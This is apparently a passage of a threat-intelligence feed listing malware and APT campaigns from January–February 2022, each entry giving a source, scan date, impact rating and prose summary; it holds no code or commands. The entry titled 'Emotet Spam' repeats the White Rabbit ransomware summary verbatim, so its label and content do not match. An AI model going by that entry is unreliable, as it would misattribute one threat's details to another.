- MEDIUM
- Summary:
- Researchers at ESET recently discovered a new campaign dubbed 'Out to Sea', attributed to APT34 (OilRig), which also has links to the Lyceum group. The group's malware toolset has also evolved, with a new backdoor named Marlin.
SolarMarker Campaign
MEDIUM
+
—
- Intel Source:
- Sophos
- Intel Name:
- SolarMarker Campaign
- Date of Scan:
- 2022-02-11
- Impact:
- MEDIUM
- Summary:
- SophosLabs has monitored a series of new efforts to distribute SolarMarker, an information stealer and backdoor first detected in 2020. The .NET malware, usually delivered by a PowerShell installer, has information-harvesting and backdoor capabilities.
CoinStomp Malware
MEDIUM
+
—
- Intel Source:
- Cado security
- Intel Name:
- CoinStomp Malware
- Date of Scan:
- 2022-02-11
- Impact:
- MEDIUM
- Summary:
- Cado Security researchers discovered a new malware campaign targeting Asian cloud service providers (CSPs). The malware, dubbed CoinStomp, exploits cloud compute instances to mine cryptocurrency.
Transparent Tribe Group/APT36
HIGH
+
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Transparent Tribe Group/APT36
- Date of Scan:
- 2022-02-11
- Impact:
- HIGH
- Summary:
- Researchers at Talos recently analyzed CrimsonRAT and ObliqueRAT samples and attributed the attacks to the Transparent Tribe threat group, also known as APT36. The threat actor is known to target India. Its initial infection vector is usually an email purporting to come from official sources and containing a lure, which can be a Word document or, more often, an Excel spreadsheet.
Emotet dropping Cobalt Strike
HIGH
+
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Emotet dropping Cobalt Strike
- Date of Scan:
- 2022-02-11
- Impact:
- HIGH
- Summary:
- Researchers at SANS dissected a Cobalt Strike sample dropped by Emotet and shared their analysis.
Lorenz Ransomware
MEDIUM
+
—
- Intel Source:
- Cybereason
- Intel Name:
- Lorenz Ransomware
- Date of Scan:
- 2022-02-11
- Impact:
- MEDIUM
- Summary:
- Lorenz ransomware was first seen in February 2021 and is believed to be a rebranding of the '.s40' ransomware. Lorenz targets organizations worldwide with customized attacks, mostly in English-speaking countries.
RedLine Stealer disguised as Windows 11 installer
MEDIUM
+
—
- Intel Source:
- HP
- Intel Name:
- RedLine Stealer disguised as Windows 11 installer
- Date of Scan:
- 2022-02-11
- Impact:
- MEDIUM
- Summary:
- Threat actors started luring Windows 10 users soon after the announcement of the Windows 11 upgrade. They use a fake Microsoft website to trick users into downloading and running a fake installer that executes the RedLine stealer malware.
Molerat Palestinian-Aligned Espionage campaign
HIGH
+
—
- Intel Source:
- Proofpoint
- Intel Name:
- Molerat Palestinian-Aligned Espionage campaign
- Date of Scan:
- 2022-02-10
- Impact:
- HIGH
- Summary:
- Proofpoint researchers discovered a new campaign by the Molerats threat group (TA402), which is allegedly aligned with Palestinian interests. TA402 is abusing Dropbox not only for delivery of the NimbleMamba malware but also for malware command and control (C2).
PrivateLoader
MEDIUM
+
—
- Intel Source:
- Intel471
- Intel Name:
- PrivateLoader
- Date of Scan:
- 2022-02-10
- Impact:
- MEDIUM
- Summary:
- Intel 471 researchers' analysis of a pay-per-install loader, PrivateLoader, highlights its role in deploying popular malware strains including SmokeLoader, Vidar and RedLine. PrivateLoader is distributed mostly through cracked-software websites.
SEO Poisoning distributes BATLOADER malware
HIGH
+
—
- Intel Source:
- Mandiant
- Intel Name:
- SEO Poisoning distributes BATLOADER malware
- Date of Scan:
- 2022-02-09
- Impact:
- HIGH
- Summary:
- Mandiant researchers uncovered a malicious campaign that uses SEO poisoning to trick potential victims into downloading the BATLOADER malware. The attackers created malicious sites packed with keywords for popular software products and used search engine optimization poisoning to make them rank higher in search results.
Lazarus APT targeting job seekers
LOW
+
—
- Intel Source:
- CyberGeeks
- Intel Name:
- Lazarus APT targeting job seekers
- Date of Scan:
- 2022-02-09
- Impact:
- LOW
- Summary:
- Lazarus APT is once again targeting job seekers, using job-opportunity documents for companies such as Lockheed Martin, BAE Systems and Boeing. The researcher analyzed a document called Boeing BDS MSE.docx aimed at people looking for jobs at Boeing. The malware collects the hostname, username, network information, a list of processes and other data, which is exfiltrated to one of four C2 servers.
Mac Trojan:Update Agent
MEDIUM
+
—
- Intel Source:
- Microsoft
- Intel Name:
- Mac Trojan:Update Agent
- Date of Scan:
- 2022-02-09
- Impact:
- MEDIUM
- Summary:
- The Mac trojan UpdateAgent has evolved, adding multiple capabilities to its arsenal, such as bypassing Gatekeeper. It lures victims by impersonating legitimate software and can leverage Mac device functionality to its benefit.
Chinese APT Antlion targets financial institutions
LOW
+
—
- Intel Source:
- Symantec
- Intel Name:
- Chinese APT Antlion targets financial institutions
- Date of Scan:
- 2022-02-09
- Impact:
- LOW
- Summary:
- Antlion, a Chinese state-backed APT, has been targeting financial institutions in Taiwan in a persistent campaign spanning at least 18 months. The attackers deployed a custom backdoor, which Symantec calls xPack, on compromised systems, giving them extensive access to victim machines.
Arid Viper APT
MEDIUM
+
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Arid Viper APT
- Date of Scan:
- 2022-02-09
- Impact:
- MEDIUM
- Summary:
- Cisco Talos observed a new wave of the Delphi malware Micropsia, developed and operated by the Arid Viper APT group since 2017. This campaign targets Palestinian entities and activists using politically themed lures. The group is believed to be based in Gaza and is known to target organizations all over the world.
Operation EmailThief
MEDIUM
+
—
- Intel Source:
- Volexity
- Intel Name:
- Operation EmailThief
- Date of Scan:
- 2022-02-09
- Impact:
- MEDIUM
- Summary:
- An alleged Chinese threat actor tracked as TEMP_Heretic is actively attempting to exploit a zero-day cross-site scripting (XSS) vulnerability in the Zimbra open-source email platform in a campaign named EmailThief. Successful exploitation of the XSS vulnerability could allow the threat actor to execute arbitrary JavaScript code in the victim's browser.
QakBot Phishing campaign
HIGH
- Intel Source:
- DFIR Report
- Intel Name:
- QakBot Phishing campaign
- Date of Scan:
- 2022-02-09
- Impact:
- HIGH
- Summary:
- Qakbot activity since October 2021 has been demystified by DFIR researchers. A malicious email campaign was used to deliver an Excel (xls) document. After the xls document was opened, the initial Qbot DLL loader was downloaded and saved to disk.
Gold Dragon Malware
MEDIUM
- Intel Source:
- AhnLab
- Intel Name:
- Gold Dragon Malware
- Date of Scan:
- 2022-02-08
- Impact:
- MEDIUM
- Summary:
- A new wave of activity from the Kimsuky hacking group has been spotted by the ASEC analysis team. The group was using xRAT (an open-source RAT), dropped alongside their custom backdoor dubbed Gold Dragon. The campaign started on January 24, 2022, targeting South Korean entities, and is still ongoing.
Lockbit 2.0 TTP_Seeder Queries_07/02/2022
MEDIUM
- Intel Source:
- STR
- Intel Name:
- Lockbit 2.0 TTP_Seeder Queries_07/02/2022
- Date of Scan:
- 2022-02-08
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
LockBit 2.0 Ransomware
HIGH
- Intel Source:
- FBI FLASH
- Intel Name:
- LockBit 2.0 Ransomware
- Date of Scan:
- 2022-02-08
- Impact:
- HIGH
- Summary:
- LockBit 2.0 operates as an affiliate-based Ransomware-as-a-Service (RaaS) and employs a wide variety of tactics, techniques and procedures (TTPs). LockBit 2.0 ransomware compromises victim networks through a variety of techniques, including but not limited to purchased access, unpatched vulnerabilities, insider access and zero-day exploits.
QBot_Seeder Queries_07/02/2022
MEDIUM
- Intel Source:
- STR
- Intel Name:
- QBot_Seeder Queries_07/02/2022
- Date of Scan:
- 2022-02-08
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
BazarBackdoor malware campaign
MEDIUM
- Intel Source:
- Bleeping Computer
- Intel Name:
- BazarBackdoor malware campaign
- Date of Scan:
- 2022-02-07
- Impact:
- MEDIUM
- Summary:
- A new phishing campaign is using specially crafted CSV text files to infect users' devices with the BazarBackdoor malware. The phishing emails pretend to be 'Payment Remittance Advice' with links to remote sites that download a CSV file with names similar to 'document-21966.csv.'
Blackcat Ransomware_Seeder Queries_04/02/2022
HIGH
- Intel Source:
- STR
- Intel Name:
- Blackcat Ransomware_Seeder Queries_04/02/2022
- Date of Scan:
- 2022-02-07
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
StrifeWater RAT added to Iranian APT Moses Staff arsenal
MEDIUM
- Intel Source:
- Cybereason
- Intel Name:
- StrifeWater RAT added to Iranian APT Moses Staff arsenal
- Date of Scan:
- 2022-02-04
- Impact:
- MEDIUM
- Summary:
- Researchers discovered a previously unidentified Remote Access Trojan (RAT) in the Moses Staff arsenal, dubbed StrifeWater. The StrifeWater RAT appears to be used in the initial stage of the attack, and this stealthy RAT has the ability to remove itself from the system to cover the Iranian group's tracks. The RAT possesses other capabilities such as command execution and screen capturing, as well as the ability to download additional extensions.
White Tur Threat Group
MEDIUM
- Intel Source:
- PWC
- Intel Name:
- White Tur Threat Group
- Date of Scan:
- 2022-02-04
- Impact:
- MEDIUM
- Summary:
- A newly detailed threat actor, dubbed 'White Tur', has been observed employing various techniques borrowed from multiple advanced persistent threat (APT) actors. The adversary hasn't been attributed to a specific geography, although it appears to have been active since at least 2017. The adversary was also observed abusing the open-source project OpenHardwareMonitor for payload execution.
Sugar Ransomware
MEDIUM
- Intel Source:
- Walmart Global Tech Blog
- Intel Name:
- Sugar Ransomware
- Date of Scan:
- 2022-02-04
- Impact:
- MEDIUM
- Summary:
- Recently a threat actor has been starting up a RaaS offering that appears to primarily focus on individual computers instead of entire enterprises, while also reusing objects from other ransomware families. Researchers analysed a sample from a tweet and identified it as Sugar Ransomware.
Mars Stealer- New variant of Oski Stealer
LOW
- Intel Source:
- @3xport
- Intel Name:
- Mars Stealer- New variant of Oski Stealer
- Date of Scan:
- 2022-02-04
- Impact:
- LOW
- Summary:
- A new variant of the Oski stealer has been identified in the wild, named Mars Stealer. It has the capability to steal information from all popular web browsers, two-factor authentication plugins, and multiple cryptocurrency extensions and wallets.
WhisperGate Lateral Movement_Seeder Queries_02/02/2022
HIGH
- Intel Source:
- STR
- Intel Name:
- WhisperGate Lateral Movement_Seeder Queries_02/02/2022
- Date of Scan:
- 2022-02-03
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
PowerLess Trojan by Phosphorus/APT35
HIGH
- Intel Source:
- Cybereason
- Intel Name:
- PowerLess Trojan by Phosphorus/APT35
- Date of Scan:
- 2022-02-03
- Impact:
- HIGH
- Summary:
- Cybereason researchers recently discovered a new set of tools developed by the Phosphorus group and incorporated into their arsenal, including a novel PowerShell backdoor dubbed PowerLess Backdoor. The research also highlights a stealthy technique used by the group to avoid PowerShell detection: running the PowerShell backdoor in a .NET context rather than spawning the PowerShell process.
MuddyWater targets Turkish users
HIGH
- Intel Source:
- Cisco Talos
- Intel Name:
- MuddyWater targets Turkish users
- Date of Scan:
- 2022-02-03
- Impact:
- HIGH
- Summary:
- Researchers at Cisco Talos have observed a new campaign targeting Turkish private organizations alongside governmental institutions. They have attributed this campaign with high confidence to MuddyWater, which utilizes malicious PDFs, XLS files and Windows executables to deploy malicious PowerShell-based downloaders acting as initial footholds.
StellarParticle campaign by CozyBear/APT29
HIGH
- Intel Source:
- CrowdStrike
- Intel Name:
- StellarParticle campaign by CozyBear/APT29
- Date of Scan:
- 2022-02-02
- Impact:
- HIGH
- Summary:
- Researchers at CrowdStrike have tracked the activities of the StellarParticle campaign and its association with the COZY BEAR adversary group. They also discuss the tactics and techniques leveraged in StellarParticle, a few of which are credential hopping, use of the TrailBlazer implant and a Linux variant of the GoldMax malware.
ShuckWorm targets Ukraine
MEDIUM
- Intel Source:
- Symantec
- Intel Name:
- ShuckWorm targets Ukraine
- Date of Scan:
- 2022-02-02
- Impact:
- MEDIUM
- Summary:
- Symantec researchers came across a cyber-espionage campaign targeting Ukraine. This campaign was attributed to a well-known threat actor group called Shuckworm, which is allegedly a state-sponsored threat group from Russia.
BotenaGo Malware
MEDIUM
- Intel Source:
- AT&T
- Intel Name:
- BotenaGo Malware
- Date of Scan:
- 2022-02-02
- Impact:
- MEDIUM
- Summary:
- BotenaGo malware source code is now available to any malicious hacker or malware developer. With only 2,891 lines of code, BotenaGo has the potential to be the starting point for many new variants and new malware families using its source code. Alien Labs expects to see new campaigns based on BotenaGo variants targeting routers and IoT devices globally.
Lazarus APT
HIGH
- Intel Source:
- Malwarebytes
- Intel Name:
- Lazarus APT
- Date of Scan:
- 2022-02-02
- Impact:
- HIGH
- Summary:
- This attack by the North Korean APT includes a clever use of Windows Update to execute the malicious payload and of GitHub as a command-and-control server.
Belarusian Cyber-Partisans group attack national railways
LOW
- Intel Source:
- Curated Intel
- Intel Name:
- Belarusian Cyber-Partisans group attack national railways
- Date of Scan:
- 2022-02-01
- Impact:
- LOW
- Summary:
- The Belarusian hacktivist group known as the Belarusian Cyber-Partisans claimed responsibility for a limited attack against the national railway company. A primary objective of the attack, they claimed, was hindering Russian troop movements inside Belarus. Initial access was via the BlueKeep RCE (CVE-2019-0708) in RDP on a Windows Server 2008 R2 system. The group used the 3proxy[.]ru service to launch attacks from a VPS, and used Mimikatz to dump LSASS, among other techniques.
APT 27 targetting German Companies
LOW
- Intel Source:
- Federal Office_German Government
- Intel Name:
- APT 27 targetting German Companies
- Date of Scan:
- 2022-02-01
- Impact:
- LOW
- Summary:
- The German government issued a warning about a Chinese cyber-espionage campaign that has been targeting German companies by exploiting vulnerabilities in Microsoft Exchange and Zoho Self Service. In this campaign, HyperBro malware was used.
WaspLocker Ransomware
LOW
- Intel Source:
- Cyfirma
- Intel Name:
- WaspLocker Ransomware
- Date of Scan:
- 2022-02-01
- Impact:
- LOW
- Summary:
- WaspLocker is ransomware that encrypts files on the system with AES+RSA encryption, appends the .0.locked extension to the encrypted files and puts them in a folder with the .locked extension. It spreads via phishing, spear-phishing and social-engineering tactics.
Chaes Banking Trojan
HIGH
- Intel Source:
- Avast
- Intel Name:
- Chaes Banking Trojan
- Date of Scan:
- 2022-01-31
- Impact:
- HIGH
- Summary:
- Researchers from Avast discovered that the Chaes banking Trojan has been actively spreading since November 2020. Chaes is notable for its multi-stage distribution method, which makes use of programming frameworks such as JScript, Python and NodeJS, binary files written in Delphi, as well as malicious Google Chrome extensions, among other things.
Prophet Spider exploiting Log4j Vulnerability
HIGH
- Intel Source:
- Blackberry
- Intel Name:
- Prophet Spider exploiting Log4j Vulnerability
- Date of Scan:
- 2022-01-31
- Impact:
- HIGH
- Summary:
- The BlackBerry Research team has correlated an attack by the Prophet Spider group with exploitation of the Log4j vulnerability in VMware Horizon. Researchers also claim to have observed Prophet Spider TTPs consistent with selling network access to other criminals, including ransomware gangs. Despite VMware's patch and subsequent guidance, many implementations remain unpatched, leaving them susceptible to exploitation.
Log4j 4 IP's
HIGH
- Intel Source:
- Internal
- Intel Name:
- Log4j 4 IP's
- Date of Scan:
- 2022-01-31
- Impact:
- HIGH
- Summary:
- IP addresses linked to the Log4j vulnerability.
KONNI RAT
HIGH
- Intel Source:
- MalwareBytes
- Intel Name:
- KONNI RAT
- Date of Scan:
- 2022-01-31
- Impact:
- HIGH
- Summary:
- KONNI is a Remote Administration Tool that has been used for at least 8 years. The North Korean threat actor using this piece of malware has been identified under the Kimsuky umbrella. KONNI RAT is being actively developed, and new samples now include significant updates.
Analysis of a Management IP Address linked to Molerats APT
MEDIUM
- Intel Source:
- Team Cymru
- Intel Name:
- Analysis of a Management IP Address linked to Molerats APT
- Date of Scan:
- 2022-01-28
- Impact:
- MEDIUM
- Summary:
- Team Cymru has analysed management IP addresses linked to the Molerats APT. These were higher-order infrastructure using IP addresses assigned to Palestinian providers. Additionally, the targets identified were in Israel and Saudi Arabia.
Midas Ransomware
MEDIUM
- Intel Source:
- Sophos
- Intel Name:
- Midas Ransomware
- Date of Scan:
- 2022-01-28
- Impact:
- MEDIUM
- Summary:
- An attack on a technology vendor was identified, and the ransomware behind it was Midas. The Midas ransomware attack highlights the risks of limited access controls and "ghost" tools. The attackers were able to spend nearly two months undetected in the target's environment.
AsyncRAT
MEDIUM
- Intel Source:
- Morphisec
- Intel Name:
- AsyncRAT
- Date of Scan:
- 2022-01-28
- Impact:
- MEDIUM
- Summary:
- Morphisec researchers have identified a new sophisticated delivery campaign that evades multiple AVs. Through a simple email phishing tactic with an HTML attachment, threat actors are delivering AsyncRAT (a remote access trojan) designed to remotely monitor and control infected computers through a secure, encrypted connection.
TrickBot Invoices
HIGH
- Intel Source:
- Cofense
- Intel Name:
- TrickBot Invoices
- Date of Scan:
- 2022-01-27
- Impact:
- HIGH
- Summary:
- In the new campaign, TrickBot is taking advantage of supply chain delays and sending phishing emails to users with an invoice attachment claiming to be from USPS. This TrickBot campaign demonstrates more effort than past campaigns with respect to design, particularly in the email itself. Most of the time the style of TrickBot campaign emails is relatively simple and can be easily spotted as suspicious.
DazzleSpy macOS malware
MEDIUM
- Intel Source:
- WeLiveSecurity
- Intel Name:
- DazzleSpy macOS malware
- Date of Scan:
- 2022-01-27
- Impact:
- MEDIUM
- Summary:
- ESET researchers discovered a new watering-hole attack targeting macOS users and visitors of a pro-democracy radio station website in Hong Kong, infecting them with the DazzleSpy malware.
WhisperGate TTP_Seeder Queries
HIGH
- Intel Source:
- STR
- Intel Name:
- WhisperGate TTP_Seeder Queries
- Date of Scan:
- 2022-01-26
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
PKEXEC LPE/CVE-2021-4034_Seeder Queries
MEDIUM
- Intel Source:
- STR
- Intel Name:
- PKEXEC LPE/CVE-2021-4034_Seeder Queries
- Date of Scan:
- 2022-01-26
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
APT36/Earth Karkaddan
HIGH
- Intel Source:
- Trend Micro
- Intel Name:
- APT36/Earth Karkaddan
- Date of Scan:
- 2022-01-25
- Impact:
- HIGH
- Summary:
- According to Trend Micro researchers, the suspected Pakistani threat actor group APT36, aka Earth Karkaddan, has expanded its malware arsenal by adding a new Android RAT malware, CapraRAT.
Trickbot's new evasion technique
HIGH
- Intel Source:
- IBM
- Intel Name:
- Trickbot's new evasion technique
- Date of Scan:
- 2022-01-25
- Impact:
- HIGH
- Summary:
- As per Security Intelligence researchers, TrickBot operators have been escalating activity. As part of that escalation, malware injections have been fitted with added protection to keep researchers out and get through security controls.
OceanLotus APT attack
HIGH
- Intel Source:
- QI-ANXIN Threat Intelligence Center
- Intel Name:
- OceanLotus APT attack
- Date of Scan:
- 2022-01-25
- Impact:
- HIGH
- Summary:
- The state-sponsored threat actor group known as OceanLotus is using the web archive file format to evade system detection while delivering backdoors for intrusion. A report from QI-ANXIN Threat Intelligence Center claims that OceanLotus’s campaign is actively using web archive files (.MHT and .MHTML) for its attacks.
STRRAT Malware
MEDIUM
- Intel Source:
- Fortinet
- Intel Name:
- STRRAT Malware
- Date of Scan:
- 2022-01-25
- Impact:
- MEDIUM
- Summary:
- Researchers at Fortinet have identified an email that was subsequently found to harbor a variant of the STRRAT malware as an attachment. STRRAT is a multi-capability Remote Access Trojan that dates to at least mid-2020. Unusually, it is Java-based, and it is typically delivered to victims via phishing email.
BRATA RAT malware
MEDIUM
- Intel Source:
- Cleafy Labs
- Intel Name:
- BRATA RAT malware
- Date of Scan:
- 2022-01-25
- Impact:
- MEDIUM
- Summary:
- Researchers from Cleafy have tracked BRATA malware and have documented its evolution in terms of both new targets and new features.
Infected PowerPoint Files Using Cloud Services to Deliver Multiple Malware
MEDIUM
- Intel Source:
- Netskope
- Intel Name:
- Infected PowerPoint Files Using Cloud Services to Deliver Multiple Malware
- Date of Scan:
- 2022-01-25
- Impact:
- MEDIUM
- Summary:
- Researchers at Netskope have identified an increase in the usage of one specific file type from the Microsoft Office suite: PowerPoint. These relatively small files are being delivered through phishing emails, then download and execute malicious scripts through LoLBins, a common technique often used to stay under the radar.
FIN7 trojanized USB
HIGH
- Intel Source:
- Gemini Advisory
- Intel Name:
- FIN7 trojanized USB
- Date of Scan:
- 2022-01-24
- Impact:
- HIGH
- Summary:
- Gemini Advisory researchers found the FIN7 group using flash drives to spread a remote access trojan. It uses trojanized USB devices to ultimately load the IceBot Remote Access Trojan (RAT), resulting in FIN7 gaining unauthorized remote access to systems within victims' networks.
MoonBounce Implant_Seeder Queries
HIGH
- Intel Source:
- STR
- Intel Name:
- MoonBounce Implant_Seeder Queries
- Date of Scan:
- 2022-01-24
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
AIKIDO C2_Seeder Queries - 24/01/2022
HIGH
- Intel Source:
- STR
- Intel Name:
- AIKIDO C2_Seeder Queries - 24/01/2022
- Date of Scan:
- 2022-01-24
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
DDoS IRC Bot Malware
LOW
- Intel Source:
- ASEC
- Intel Name:
- DDoS IRC Bot Malware
- Date of Scan:
- 2022-01-24
- Impact:
- LOW
- Summary:
- The ASEC Research Team has discovered that DDoS IRC Bot strains disguised as adult games are being installed via webhards. Webhards are platforms commonly used for the distribution of malware in Korea, where njRAT and UDP Rat were distributed in the past.
Emotet Spam
HIGH
- Intel Source:
- Trend Micro
- Intel Name:
- Emotet Spam
- Date of Scan:
- 2022-01-24
- Impact:
- HIGH
- Summary:
- The Trend Micro research team spotted the new ransomware family named 'White Rabbit', which is discreetly making a name for itself after executing an attack on a local US bank in December 2021. The ransomware copies the hiding capability of Egregor and carries a potential connection to the APT group FIN8.
Molerats APT Espionage campaign
HIGH
- Intel Source:
- Zscaler
- Intel Name:
- Molerats APT Espionage campaign
- Date of Scan:
- 2022-01-24
- Impact:
- HIGH
- Summary:
- The Zscaler ThreatLabz team has detected several samples of macro-based MS Office files uploaded from Middle Eastern countries. These files contained decoy themes related to geo-political conflicts between Israel and Palestine. Such themes have been used in previous attack campaigns waged by the Molerats APT.
DTPacker
MEDIUM
- Intel Source:
- Proofpoint
- Intel Name:
- DTPacker
- Date of Scan:
- 2022-01-24
- Impact:
- MEDIUM
- Summary:
- Researchers at Proofpoint have identified a malware packer which they have dubbed 'DTPacker'. The packer is typically used to pack remote access trojans that can be used to steal information and load follow-on payloads such as ransomware.
DoL Phishing
MEDIUM
- Intel Source:
- INKY
- Intel Name:
- DoL Phishing
- Date of Scan:
- 2022-01-21
- Impact:
- MEDIUM
- Summary:
- Researchers at INKY have detected a phishing campaign that impersonated the United States Department of Labor (DoL). In this campaign the majority of phishing attempts had sender email addresses spoofed to look as if they came from [email protected][.]gov, which is the real DoL site. A small subset was spoofed to look as if they came from [email protected][.]com, which is of course not the real DoL domain.
DONOT Hacking team/APT-C-35/SectorE02
MEDIUM
- Intel Source:
- WeLiveSecurity
- Intel Name:
- DONOT Hacking team/APT-C-35/SectorE02
- Date of Scan:
- 2022-01-21
- Impact:
- MEDIUM
- Summary:
- ESET researchers take a deep look into recent attacks carried out by Donot Team throughout 2020 and 2021, targeting government and military entities in several South Asian countries.
Mirai Botnet Abusing Log4j
HIGH
- Intel Source:
- Akamai
- Intel Name:
- Mirai Botnet Abusing Log4j
- Date of Scan:
- 2022-01-21
- Impact:
- HIGH
- Summary:
- Researchers at Akamai have examined an ARM binary, which revealed the adaptation of the Log4j vulnerability to infect and assist in the proliferation of malware used by the Mirai botnet.
BHUNT Stealer
MEDIUM
- Intel Source:
- BitDefender
- Intel Name:
- BHUNT Stealer
- Date of Scan:
- 2022-01-21
- Impact:
- MEDIUM
- Summary:
- Bitdefender researchers have discovered a new family of crypto-wallet stealer malware dubbed 'BHUNT'. The samples identified appear to have been digitally signed with a certificate issued to a software company, but the certificate does not match the binaries.
Targeted ICS Spyware
MEDIUM
- Intel Source:
- Kaspersky
- Intel Name:
- Targeted ICS Spyware
- Date of Scan:
- 2022-01-20
- Impact:
- MEDIUM
- Summary:
- Kaspersky ICS experts have noticed a large set of campaigns that spread from one industrial enterprise to another via hard-to-detect phishing emails disguised as the victim organizations' correspondence, abusing their corporate email systems to attack through the contact lists of compromised mailboxes.
Operation Bleeding Bear
HIGH
- Intel Source:
- Elastic
- Intel Name:
- Operation Bleeding Bear
- Date of Scan:
- 2022-01-20
- Impact:
- HIGH
- Summary:
- Researchers at Elastic Security provide new analysis and insights into a targeted campaign against Ukrainian organizations with destructive malware. In a multi-staged attack, one malware component, known as WhisperGate, uses a wiping capability on the Master Boot Record (MBR), making any impacted machine inoperable after boot-up.
MoonBounce
HIGH
- Intel Source:
- Kaspersky
- Intel Name:
- MoonBounce
- Date of Scan:
- 2022-01-20
- Impact:
- HIGH
- Summary:
- Kaspersky researchers have identified a UEFI firmware-level compromise. Further analysis showed that a single component within the inspected firmware image was modified by attackers in a way that allowed them to intercept the original execution flow of the machine's boot sequence and introduce a sophisticated infection chain.
White Rabbit Ransomware
MEDIUM
- Intel Source:
- Trend Micro
- Intel Name:
- White Rabbit Ransomware
- Date of Scan:
- 2022-01-20
- Impact:
- MEDIUM
- Summary:
- The Trend Micro research team spotted the new ransomware family named 'White Rabbit', which is discreetly making a name for itself after executing an attack on a local US bank in December 2021. The ransomware copies the hiding capability of Egregor and carries a potential connection to the APT group FIN8.
Blackcat Ransomware
MEDIUM
- Intel Source:
- SentinelOne
- Intel Name:
- Blackcat Ransomware
- Date of Scan:
- 2022-01-20
- Impact:
- MEDIUM
- Summary:
- Researchers at SentinelOne analysed BlackCat ransomware behaviour. BlackCat first appeared in late November 2021 and has reportedly been attacking targets in multiple countries, including Australia, India and the U.S., demanding ransoms in the region of $400,000 to $3,000,000 in Bitcoin or Monero.
WhisperGate
HIGH
- Intel Source:
- Microsoft
- Intel Name:
- WhisperGate
- Date of Scan:
- 2022-01-20
- Impact:
- HIGH
- Summary:
- MSTIC found a destructive malware operation that has been targeting organizations in Ukraine. The malware has been dubbed WhisperGate. The activity has been identified as possible Master Boot Record (MBR) wiper activity.
vSphere cryptominer campaign
MEDIUM
- Intel Source:
- Uptycs
- Intel Name:
- vSphere cryptominer campaign
- Date of Scan:
- 2022-01-19
- Impact:
- MEDIUM
- Summary:
- Researchers from Uptycs identified malicious shell scripts that specifically target VMware vSphere. The attackers used certain commands in the shell script to modify the vSphere service in order to run the Xmrig miner.
SysJoker_Seeder Queries - 12/01/2022
HIGH
- Intel Source:
- STR
- Intel Name:
- SysJoker_Seeder Queries - 12/01/2022
- Date of Scan:
- 2022-01-19
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
AIKIDO C2_Seeder Queries - 18/01/2022
MEDIUM
- Intel Source:
- STR
- Intel Name:
- AIKIDO C2_Seeder Queries - 18/01/2022
- Date of Scan:
- 2022-01-19
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
AIKIDO ICEID New Delivery Method_Seeder Queries - 12/01/2022
MEDIUM
- Intel Source:
- STR
- Intel Name:
- AIKIDO ICEID New Delivery Method_Seeder Queries - 12/01/2022
- Date of Scan:
- 2022-01-19
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
(Mailbox Phishing Kit)Espionage campaign- Renewable energy companies
MEDIUM
- Intel Source:
- Bushidotoken
- Intel Name:
- (Mailbox Phishing Kit)Espionage campaign- Renewable energy companies
- Date of Scan:
- 2022-01-19
- Impact:
- MEDIUM
- Summary:
- A security researcher discovered a large-scale cyber-espionage campaign targeting primarily renewable energy and industrial technology organizations. The attacker uses a custom 'Mail Box' toolkit, an unsophisticated phishing package deployed on the actor's infrastructure, as well as legitimate websites compromised to host phishing pages.
MuddyWater_MOIS_Seeder Queries - 14/01/2022
HIGH
- Intel Source:
- STR
- Intel Name:
- MuddyWater_MOIS_Seeder Queries - 14/01/2022
- Date of Scan:
- 2022-01-18
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
BlueNoroff APT Group
HIGH
- Intel Source:
- Kaspersky
- Intel Name:
- BlueNoroff APT Group
- Date of Scan:
- 2022-01-14
- Impact:
- HIGH
- Summary:
- The North Korea-linked APT group BlueNoroff has been spotted targeting cryptocurrency startups with fake MetaMask browser extensions. The latest attacks targeted cryptocurrency startups in the US, Russia, China, India, the UK, Ukraine, Poland, the Czech Republic, the UAE, Singapore, Estonia, Vietnam, Malta, Germany and Hong Kong.
Exploit Kits vs Chrome
MEDIUM
- Intel Source:
- Avast
- Intel Name:
- Exploit Kits vs Chrome
- Date of Scan:
- 2022-01-13
- Impact:
- MEDIUM
- Summary:
- Avast researchers found that the Underminer exploit kit developed an exploit for a Chromium-based vulnerability. There were two exploit kits that dared to attack Google Chrome: Magnitude, using CVE-2021-21224 and CVE-2021-31956, and Underminer, using CVE-2021-21224, CVE-2019-0808, CVE-2020-1020 and CVE-2020-1054.
TellYouThePass Ransomware
HIGH
- Intel Source:
- CrowdStrike
- Intel Name:
- TellYouThePass Ransomware
- Date of Scan:
- 2022-01-13
- Impact:
- HIGH
- Summary:
- CrowdStrike found a re-emerged version of TellYouThePass ransomware compiled using Golang. The same ransomware was recently associated with Log4Shell post-exploitation targeting Windows and Linux.
Magniber Ransomware
MEDIUM
- Intel Source:
- ASEC
- Intel Name:
- Magniber Ransomware
- Date of Scan:
- 2022-01-13
- Impact:
- MEDIUM
- Summary:
- Analysts from AhnLab discovered that the attackers behind the Magniber ransomware, who have so far been exploiting IE-based vulnerabilities, are now targeting PCs via modern browsers such as Edge and Chrome.
Abusing MS Office Using Malicious Web Archive Files
MEDIUM
- Intel Source:
- Netskope
- Intel Name:
- Abusing MS Office Using Malicious Web Archive Files
- Date of Scan:
- 2022-01-13
- Impact:
- MEDIUM
- Summary:
- The OceanLotus group of state-sponsored hackers is now using the web archive file format (.MHT and .MHTML) to deploy backdoors to compromised systems.
DEV-0401
MEDIUM
- Intel Source:
- Microsoft
- Intel Name:
- DEV-0401
- Date of Scan:
- 2022-01-13
- Impact:
- MEDIUM
- Summary:
